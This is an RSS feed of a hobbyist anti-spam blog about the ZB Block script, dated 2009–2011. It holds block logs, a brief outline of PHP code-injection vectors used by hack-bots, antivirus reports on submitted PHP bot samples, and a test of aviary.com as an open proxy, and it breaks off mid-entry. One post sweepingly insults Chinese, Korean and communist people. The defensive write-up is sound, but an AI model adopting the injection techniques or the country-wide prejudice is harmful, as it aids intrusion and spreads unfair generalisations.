<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title>Spambot Security Blog</title>
<link>http://www.spambotsecurity.com/blog/index.php</link>
<description>Observations on Internet Server Security Related Issues.</description>
<language>en-US</language>
<copyright>Copyright 2011</copyright>
<lastBuildDate>Thu, 04 Aug 2011 04:35:23 -0600</lastBuildDate>
<pubDate>Thu, 04 Aug 2011 04:35:23 -0600</pubDate>
<generator>http://thingamablog.sf.net</generator>
<docs>http://blogs.law.harvard.edu/tech/rss</docs>

<item>
<title>Over 100,000 Served (Notice that is)</title>
<description>&lt;p&gt;
      That's right, SpambotSecurity.com, the homesite of ZB Block, has had 
      it's one hundred thousandth attempt to spam, hack or access from a 
      banned IP. Here it is.
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffff00&quot;&gt;&lt;b&gt;#: 100000 @: 2011-07-25, Mon - 06:39:26 -06:00 
      Running: 0.4.10a&lt;br&gt;Host: 112.163.239.105&lt;br&gt;IP: 112.163.239.105&lt;br&gt;Score: 
      1&lt;br&gt;Violation count: 1&lt;br&gt;&lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font color=&quot;#ff0000&quot;&gt;Why 
      blocked: No registrations, or logins, from hosts listed as hostile on 
      http://www.stopforumspam.com/ (remote).&lt;/font&gt;&lt;font color=&quot;#ffff00&quot;&gt;&lt;br&gt;Query: 
      mode=register&amp;amp;sid=8b3582798f39fa2112e9fd68fdd1b021&lt;br&gt;Referer: 
      http://www.spambotsecurity.com/forum/ucp.php?mode=register&amp;amp;sid=8b3582798f39fa2112e9fd68fdd1b021&lt;br&gt;User 
      Agent: Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)&lt;br&gt;Reconstructed 
      URL: http:// www.spambotsecurity.com 
      /forum/ucp.php?mode=register&amp;amp;sid=8b3582798f39fa2112e9fd68fdd1b021&lt;/font&gt;&lt;/b&gt;&lt;font color=&quot;#ffff00&quot;&gt;&lt;br&gt;&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      Thanks for the Assist Stop Forum Spam!
    &lt;/p&gt;
    &lt;p&gt;
      If anything can be gleaned from this is, that skiddies, and &amp;quot;SEO&amp;quot; people 
      have no brains, and keep beating a dead horse. You would think by now 
      that this site would be considered toxic waste, yet, they keep dashing 
      themselves against it like waves against the polder dike. Yea, in those 
      100,000 attempts, I have seen actual hackers (probably larval, but a few 
      were showing signs of intellect) try to hack, but to no avail, in the 
      words of Elton John,
    &lt;/p&gt;
    &lt;p&gt;
      &lt;i&gt;&lt;font color=&quot;#00ff00&quot;&gt;Don't you know I'm still standing better than I 
      ever did&lt;br&gt;Looking like a true survivor, feeling like a little kid&lt;br&gt;I'm 
      still standing after all this time&lt;br&gt;Picking up the pieces of my life 
      without you on my mind&lt;/font&gt;&lt;/i&gt;
    &lt;/p&gt;
    &lt;p&gt;
      Pretty much sums up what things feel like right now.
    &lt;/p&gt;
    &lt;p&gt;
      Most of the hackers flee once they known they have hit here, but some 
      goof, leave pretty injection links behind, which I then download via 
      lynx, and decode in the various ways they have encoded them. Then I 
      usually have some data wherewith to strengthen ZB Block, or a signature 
      to report to my fav. virus scanning company, or at least a reporting 
      e-mail/IP address to have shut down. Here's to 100,000 down, and the 
      next 100,000. May ZB Block never fail, and may I learn the latest tricks 
      and strengthen it before it can fail.
    &lt;/p&gt;
    &lt;p&gt;
      But I am still going to be always vigilant, and remember that to 
      continue the battle, is to achieve victory. To stop fighting, is to be 
      overrun.
    &lt;/p&gt;
    &lt;p&gt;
      Zap :)
    &lt;/p&gt;</description>
<link>http://www.spambotsecurity.com/blog/archives/08-01-2011_08-31-2011.php#72</link>
<guid>http://www.spambotsecurity.com/blog/archives/08-01-2011_08-31-2011.php#72</guid>

<category>Security Musings</category>

<category>Spam Bot</category>

<category>Stupid Bot</category>

<pubDate>Thu, 04 Aug 2011 04:16:58 -0600</pubDate>
</item>

<item>
<title>MaMa CaSpEr and her clan of new hack-bots... and ZB Block's Response</title>
<description>&lt;p&gt;
      Well, for months, ZB Block has been concentrating on the 'QUERY_STRING' 
      that the hostile bots were sending websites. This used to be the only 
      way that websites were hacked, and dare I say, we were effective enough 
      to cause the attack bot script writers to jump to a new paradigm of 
      attacks. The new attacks, come through the 'HTTP_POST' subsystem. 
      However like a good general, my troops had in-place a system to help 
      combat this new vector, it just wasn't needed till now.
    &lt;/p&gt;
    &lt;p&gt;
      The new threat comes from a new family of bots. The first one of this 
      breed of breed of bots, as far as I've been able to discern is MaMa 
      CaSpEr, followed by Casper, Dex, Kangen, kmccrew, Sasquia, Sledink, and 
      plaNETWORK bots, plus many others yet to be found. The one defining 
      factor is, they attempt to execute instructions through breaking the 
      http_post variable input system. This is done with execution wedges, 
      either through direct &amp;quot;&amp;lt;?php (code) ?&amp;gt;&amp;quot; , bbcode &amp;quot;[php] (code) [/php]&amp;quot;, 
      or oddly enough XML &amp;quot;&amp;lt;methodCall&amp;gt;&amp;quot; execution wedging. The one defining 
      factor is, they try to slip it in through scripts that use the once 
      unexploited HTTP_POST vector.
    &lt;/p&gt;
    &lt;p&gt;
      Well, I guess it's now the new frontier of malicious web robot 
      exploitation, and I hope to be here to fight it. I could remind people 
      that sanitization of variables is the most important way to fight this 
      plague, but no matter how hard they try to make their scripts hardened, 
      the skiddies always find a way around it. All I can say to them is, 
      together, we may be able to effectively fight this. You might try 
      suggesting to your users to add ZB Block to their scripts. And to you 
      end-users out there, your script writer tried hard to avoid these 
      problems, together, we can be much stronger.
    &lt;/p&gt;
    &lt;p&gt;
      And to the skript kiddies, and the hackers programming the scripts that 
      are attacking us, just remember our motto...
    &lt;/p&gt;
    &lt;p&gt;
      &lt;b&gt;&lt;font color=&quot;#33ff00&quot; size=&quot;5&quot;&gt;“Evinco, est pergo bellum!”&lt;/font&gt;&lt;/b&gt;&lt;br&gt;&lt;font size=&quot;3&quot;&gt;&amp;quot;To 
      conquer, is to continue the war!&amp;quot;&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      Zap :)
    &lt;/p&gt;</description>
<link>http://www.spambotsecurity.com/blog/archives/07-01-2010_07-31-2010.php#69</link>
<guid>http://www.spambotsecurity.com/blog/archives/07-01-2010_07-31-2010.php#69</guid>

<category>Bad User Client</category>

<category>Exploit Bot</category>

<category>Scan Bot</category>

<category>Security Musings</category>

<category>Stupid Bot</category>

<pubDate>Fri, 23 Jul 2010 15:20:10 -0600</pubDate>
</item>

<item>
<title>China Told to Get Lost... Again.</title>
<description>&lt;p&gt;
      Yep, I tried being nice, I let China/Korea have access to my site again, 
      just incase some poor sot there was running a board, and in spam hell.
    &lt;/p&gt;
    &lt;p&gt;
      Well, lesson learned, all it did was attract low class script kiddies, 
      skript kiddies, or skiddies, whatever you want to call them. And lo, 
      when they saw ZB Block was impenetrable by their lame attacks, they 
      decided to start an http_referer spam campaign against my site, usually 
      from homosexual pornograpic sites. This is designed to hurt Google 
      Pagerank and other indicators of a site's quality. Never once did I see 
      a valid, interested access from China. Never once did they get through 
      my protections.
    &lt;/p&gt;
    &lt;p&gt;
      But they annoyed the hell out of me.
    &lt;/p&gt;
    &lt;p&gt;
      It's funny how the infamous Great Firewall of China stops normal good 
      folks from using the web, yet seems to be assisting organized crime in 
      attacking the rest of the internet. Sounds like someone is buddy-buddy 
      &amp;quot;heh-heh&amp;quot; getting their pockets lined by the Russian Business Network to 
      open the floodgates of spam. Imagine that, many people going against 
      their beloved Mao Zedong's party, and co-operating with the Russians to 
      the detriment of his people, his party, and his state. What is worse is, 
      the same attacks and spam were coming out of Korea too, this means that 
      &amp;quot;Beloved Leader&amp;quot; Kim Jong-il's people are stabbing him in the back too. 
      Just shows you how two faced communists are, no matter their stripe.
    &lt;/p&gt;
    &lt;p&gt;
      Well, lesson learned. The blocks are back in, and the ZB Block IP 
      banlist for Chinese / Korea IPs has been updated, thanks to the lists &lt;a name=&quot;Okean Sino-Korea Blocklists&quot; target=&quot;_blank&quot; title=&quot;Okean Sino-Korea Blocklists&quot; href=&quot;http://www.okean.com/antispam/sinokorea.html&quot;&gt;Okean&lt;/a&gt; 
      provides . Just paste them into the appropriate area of your 
      customsig.inc to turn off China and Korea like a switch.
    &lt;/p&gt;
    &lt;p&gt;
      It's too bad I had to resort to this, but it's a lesson learned.
    &lt;/p&gt;
    &lt;p&gt;
      Zap.
    &lt;/p&gt;</description>
<link>http://www.spambotsecurity.com/blog/archives/10-01-2009_10-31-2009.php#68</link>
<guid>http://www.spambotsecurity.com/blog/archives/10-01-2009_10-31-2009.php#68</guid>

<category>Bad User Client</category>

<category>Exploit Bot</category>

<category>Spam Bot</category>

<category>Stupid Bot</category>

<pubDate>Tue, 27 Oct 2009 01:50:37 -0600</pubDate>
</item>

<item>
<title>ZB Block Racks Up More Bot and Script Virus Kills!</title>
<description>&lt;p&gt;
      Well, Avira has gotten back to me, and it looks like I have found some 
      viral gold they can add to their arsenal for all of us.
    &lt;/p&gt;
    &lt;p&gt;
      Here's a run-down of the fresh kills I have added to ZB Block's (custom 
      in-house version w/ probe trap) record. Please note that ZB Block caused 
      &amp;quot;natural&amp;quot; immunity to all attacks attempting to install these. So do the 
      wise thing and go to http://www.spambotsecurity.com/zbblock.php and get 
      protected.
    &lt;/p&gt;
    &lt;p&gt;
      #1
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Dear Sir or Madam, &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Thank you for your email to Avira's virus 
      lab. &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Tracking number: (REMOVED). &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;A listing of files alongside their 
      results can be found below:File ID Filename Size (Byte) Result &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;25394824 Bildb 2.03 KB MALWARE &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Please find a detailed report concerning 
      each individual sample below:&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Filename Result Bildb MALWARE &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;The file 'Bildb' has been determined to 
      be 'MALWARE'. Our analysts named the threat BDS/PHP.ali.31. The term 
      &amp;quot;BDS/&amp;quot; denotes a Backdoor-Server program. Backdoor-Server programs are 
      used to spy out, modify or delete data.Detection is added to our virus 
      definition file (VDF) starting with version 7.01.04.223.&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      #2
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Thank you for your email to Avira's virus 
      lab. &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Tracking number: (REMOVED). &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;A listing of files alongside their 
      results can be found below:File ID Filename Size (Byte) Result &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;25394829 dudul3.txt 40.88 KB MALWARE &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Please find a detailed report concerning 
      each individual sample below:&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Filename Result dudul3.txt MALWARE &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;The file 'dudul3.txt' has been determined 
      to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.E.2. The term 
      &amp;quot;PHP/&amp;quot; denotes a PHP scriptvirus.Detection will be added to our virus 
      definition file (VDF) with one of the next updates.&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      #3
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Dear Sir or Madam, &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Thank you for your email to Avira's virus 
      lab. &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Tracking number: (REMOVED). &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;A listing of files alongside their 
      results can be found below:File ID Filename Size (Byte) Result &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;25394826 bot_ping.txt 100.52 KB MALWARE &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Please find a detailed report concerning 
      each individual sample below:&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Filename Result bot_ping.txt MALWARE &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;The file 'bot_ping.txt' has been 
      determined to be 'MALWARE'. Our analysts named the threat 
      PHP.IrcBot.nad. Detection will be added to our virus definition file 
      (VDF) with one of the next updates.&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      #4
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Dear Sir or Madam, &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Thank you for your email to Avira's virus 
      lab. &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Tracking number: (REMOVED). &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;A listing of files alongside their 
      results can be found below:File ID Filename Size (Byte) Result &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;25394836 spread.txt 19.34 KB MALWARE &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Please find a detailed report concerning 
      each individual sample below:&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Filename Result spread.txt MALWARE &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;The file 'spread.txt' has been determined 
      to be 'MALWARE'. Our analysts named the threat PHP/Pbot.A.6. The term 
      &amp;quot;PHP/&amp;quot; denotes a PHP scriptvirus.Detection will be added to our virus 
      definition file (VDF) with one of the next updates.&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      #5
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Dear Sir or Madam, &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Thank you for your email to Avira's virus 
      lab. &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Tracking number: (REMOVED). &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;We received the following archive files: &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;File ID Filename Size (Byte) Result &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;25395810 feelcomz 1.7 bot.zip 12.06 KB OK &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;A listing of files contained inside 
      archives alongside their results can be found below:File ID Filename 
      Size (Byte) Result &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;25395811 botphp.txt 48.89 KB MALWARE &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Please find a detailed report concerning 
      each individual sample below:&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Filename Result botphp.txt MALWARE &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;The file 'botphp.txt' has been determined 
      to be 'MALWARE'. Our analysts named the threat PHP/Pbot.A.7. The term 
      &amp;quot;PHP/&amp;quot; denotes a PHP scriptvirus.Detection will be added to our virus 
      definition file (VDF) with one of the next updates.&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      #6 &amp;amp; 7
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Dear Sir or Madam, &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Thank you for your email to Avira's virus 
      lab. &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Tracking number: (REMOVED). &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;We received the following archive files: &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;File ID Filename Size (Byte) Result &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;25395813 One attack from t...ts.zip 23.89 
      KB OK &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;A listing of files contained inside 
      archives alongside their results can be found below:File ID Filename 
      Size (Byte) Result &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;25395814 pbota.txt 27.42 KB MALWARE&lt;/font&gt;&lt;br&gt;&lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;25395815 
      pbotb.txt 27.39 KB MALWARE&lt;/font&gt;&lt;br&gt;&lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;25395816 
      pbotc.txt 27.72 KB MALWARE&lt;/font&gt;&lt;br&gt;&lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;25395817 
      pbotd.txt 27.73 KB MALWARE&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Please find a detailed report concerning 
      each individual sample below:&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Filename Result pbota.txt MALWARE &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;The file 'pbota.txt' has been determined 
      to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.E.3. The term 
      &amp;quot;PHP/&amp;quot; denotes a PHP scriptvirus.Detection will be added to our virus 
      definition file (VDF) with one of the next updates.&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Filename Result pbotb.txt MALWARE &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;The file 'pbotb.txt' has been determined 
      to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.E.4. The term 
      &amp;quot;PHP/&amp;quot; denotes a PHP scriptvirus.Detection will be added to our virus 
      definition file (VDF) with one of the next updates.&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Filename Result pbotc.txt MALWARE &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;The file 'pbotc.txt' has been determined 
      to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.E.4. The term 
      &amp;quot;PHP/&amp;quot; denotes a PHP scriptvirus.Detection will be added to our virus 
      definition file (VDF) with one of the next updates.&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;Filename Result pbotd.txt MALWARE &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;The file 'pbotd.txt' has been determined 
      to be 'MALWARE'. Our analysts named the threat PHP/IrcBot.E.4. The term 
      &amp;quot;PHP/&amp;quot; denotes a PHP scriptvirus.Detection will be added to our virus 
      definition file (VDF) with one of the next updates.&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      Sweetness I tell you. Nothing feels better than being the shiv in the 
      dark that takes some of this crap off the virtual streets. Real hackers 
      don't use scripts... they may write them, but they don't use them. (Ever 
      wonder if your pre-made script isn't designed to take away your toys 
      eventually, eh skiddy?)
    &lt;/p&gt;
    &lt;p&gt;
      If you want to see the places these were injected, well, where they were 
      attempted to be injected, just pour over the killed_log.txt files shared 
      with the public on ZB Block's page.
    &lt;/p&gt;
    &lt;p&gt;
      Most will be there. Some won't.
    &lt;/p&gt;
    &lt;p&gt;
      Where are the others? Other servers!
    &lt;/p&gt;
    &lt;p&gt;
      Where are the other servers? Wouldn't you like to know!&lt;img alt=&quot;Neener Neener!&quot; src=&quot;http://www.spambotsecurity.com/forum/images/smilies/teasing/neener.gif&quot;&gt;
    &lt;/p&gt;
    &lt;p&gt;
      
    &lt;/p&gt;
    &lt;p&gt;
      Zap! &lt;img alt=&quot;Chasing baddies with an axe!&quot; src=&quot;http://www.spambotsecurity.com/forum/images/smilies/violence/axechase.gif&quot;&gt;
    &lt;/p&gt;</description>
<link>http://www.spambotsecurity.com/blog/archives/07-01-2009_07-31-2009.php#57</link>
<guid>http://www.spambotsecurity.com/blog/archives/07-01-2009_07-31-2009.php#57</guid>

<category>Bad User Client</category>

<category>Exploit Bot</category>

<category>Scan Bot</category>

<category>Security Musings</category>

<category>Spam Bot</category>

<category>Stupid Bot</category>

<pubDate>Mon, 13 Jul 2009 15:54:41 -0600</pubDate>
</item>

<item>
<title>A little bird told me about an aviary.com full of poopy pigeons.</title>
<description>&lt;p&gt;
      &lt;font color=&quot;#99ff99&quot;&gt;&lt;i&gt;&amp;quot;But there's one thing that makes spring 
      complete for me,&lt;br&gt;And makes ev'ry Sunday a treat for me.&lt;br&gt;&lt;br&gt;All 
      the world seems in tune&lt;br&gt;On a spring afternoon,&lt;br&gt;When we're 
      poisoning pigeons in the park.&lt;br&gt;Ev'ry Sunday you'll see&lt;br&gt;My 
      sweetheart and me,&lt;br&gt;As we poison the pigeons in the park.&amp;quot; &lt;/i&gt;- 
      Tom Lehrer&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      Okay, to start this story, I have to give proper credit to &lt;a target=&quot;_blank&quot; title=&quot;Amber MacArthur's Homepage&quot; name=&quot;Amber MacArthur's Homepage&quot; href=&quot;http://ambermac.com/&quot;&gt;Amber 
      MacArthur&lt;/a&gt; and her netcast on &lt;a target=&quot;_blank&quot; title=&quot;The netcast that gave me a word-up on aviary's dirty bird.&quot; name=&quot;The netcast that gave me a word-up on aviary's dirty bird.&quot; href=&quot;http://twit.tv/natn107&quot;&gt;TWiT.tv&lt;/a&gt;. 
      She's the little bird that told me about a big nasty pidgeon ready to 
      poop on my site, and yours, just the way tynted does. No, I have not had 
      a chance to listen to the show, but the notes gave me all the &amp;quot;beef&amp;quot; I 
      needed.
    &lt;/p&gt;
    &lt;p&gt;
      The pidgeon's name is Aviary.com. It's another content scraper / content 
      theif that also allows an attacker to send a malicious request to your 
      machine, both from the previously protected against AmazonAWS cloud, and 
      the newly killed &lt;a target=&quot;_blank&quot; title=&quot;Fortress ITX is ridin' dirty. Search this linked page for them.&quot; name=&quot;Fortress ITX is ridin' dirty. Search this linked page for them.&quot; href=&quot;http://www.frws.com/spam-hallofshame.html&quot;&gt;pwebtech 
      / FortressITX&lt;/a&gt; spamhost. Modus operandi? Same as &lt;a target=&quot;_blank&quot; title=&quot;Check out all the bad crap tynt.com is guilty of on google. Especially note INCREDIBILL's site.&quot; name=&quot;Check out all the bad crap tynt.com is guilty of on google. Especially note INCREDIBILL's site.&quot; href=&quot;http://www.google.com/search?q=tynted&quot;&gt;tynt.com&lt;/a&gt;, 
      that being content theft and acting as an un-regulated proxy for hackers.
    &lt;/p&gt;
    &lt;p&gt;
      &lt;a target=&quot;_blank&quot; name=&quot;avairy.com getting nailed by ZB Block. Click for larger image in new window.&quot; title=&quot;avairy.com getting nailed by ZB Block. Click for larger image in new window.&quot; href=&quot;http://www.spambotsecurity.com/blog/images/ai1.gif&quot;&gt;&lt;img src=&quot;http://www.spambotsecurity.com/blog/images/ai1thn.gif&quot; height=&quot;240&quot; alt=&quot;aviary.com getting nailed by ZB Block. Click for larger version in new window.&quot; border=&quot;0&quot; width=&quot;320&quot; align=&quot;left&quot;&gt;
      &lt;/a&gt;Here is my first screenshot I wish to share with you after 
      establishing that Aviary.com is operating out of multiple netblocks. 
      What you see is a shot of the aviary.com site loading my site into their 
      &amp;quot;screenshot&amp;quot;. But, by the tests below, you can see it passes queries 
      just fine, as in any exploits out there could have been done through 
      them as an unregulated proxy server. The method used to send this query 
      was &lt;a target=&quot;_blank&quot; name=&quot;See Aviary.com be used as an unregulated proxy server.&quot; title=&quot;See Aviary.com be used as an unregulated proxy server.&quot; href=&quot;http://aviary.com/http://www.spambotsecurity.com/?xtestx&quot;&gt;http://aviary.com/http://www.spambotsecurity.com/?xtestx&lt;/a&gt; 
      . As you can see, it bounced the AmazonAWS perfectly, and caught the 
      trigger. Click the image for a larger (readable) one in a new window. 
      And here is the block that it generated.
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffff00&quot; size=&quot;3&quot;&gt;#: 6896 @: Mon, 13 Jul 2009 11:48:48 -0600&lt;br&gt;Host: 
      ec2-174-129-94-22.compute-1.amazonaws.com&lt;br&gt;IP: 174.129.94.22&lt;br&gt;Score: 
      1&lt;br&gt;Why blocked: Amazon Web Services. Not an ISP. Used by hackers, 
      Keyword spamming SEO bots, and other unsavories. Checked for bypass.&lt;br&gt;Query: 
      xtextx&lt;br&gt;Referer:&lt;br&gt;User Agent: Mozilla/4.0 (compatible; MSIE 7.0; 
      Windows NT 5.2; Trident/4.0; Data Center; .NET CLR 1.1.4322; .NET CLR 
      2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 
      3.0.4506.2152; .NET CLR 3.5.30729)&lt;br&gt;Reconstructed URL: http:// 
      www.spambotsecurity.com /?xtextx&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      
    &lt;/p&gt;
    &lt;p&gt;
      &lt;a target=&quot;_blank&quot; name=&quot;avairy.com getting nailed again by ZB Block. Click for larger image in new window.&quot; title=&quot;avairy.com getting nailed again by ZB Block. Click for larger image in new window.&quot; href=&quot;http://www.spambotsecurity.com/blog/images/ai2.gif&quot;&gt;&lt;img src=&quot;http://www.spambotsecurity.com/blog/images/ai2thn.gif&quot; height=&quot;240&quot; alt=&quot;aviary.com getting nailed again by ZB Block. Click for larger version in new window.&quot; border=&quot;0&quot; width=&quot;320&quot; align=&quot;left&quot;&gt;
      &lt;/a&gt;Yet another probe of Aviary.com after addition of the new spamhost ( 
      pwebtech/FortressITX ). Please note that now it is pulling from 
      viary.com! Viary.com, is, like Aviary.com, hosted on the same ridin' 
      dirty webhost. You can see, however, this time it choked. But, it still 
      did actually hit my site. Here's the blocked request. Please note it is 
      using random user agents to try to cloak itself. This is EXCEEDINGLY 
      bad, and very suspicious behavior.
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffff00&quot; size=&quot;3&quot;&gt;#: 6899 @: Mon, 13 Jul 2009 12:32:21 -0600&lt;br&gt;Host: 
      65.98.13.118&lt;br&gt;IP: 65.98.13.118&lt;br&gt;Score: 2&lt;br&gt;Why blocked: 
      pwebtech/FortressITX spam-friendly host/aviary.com unregulated proxy 
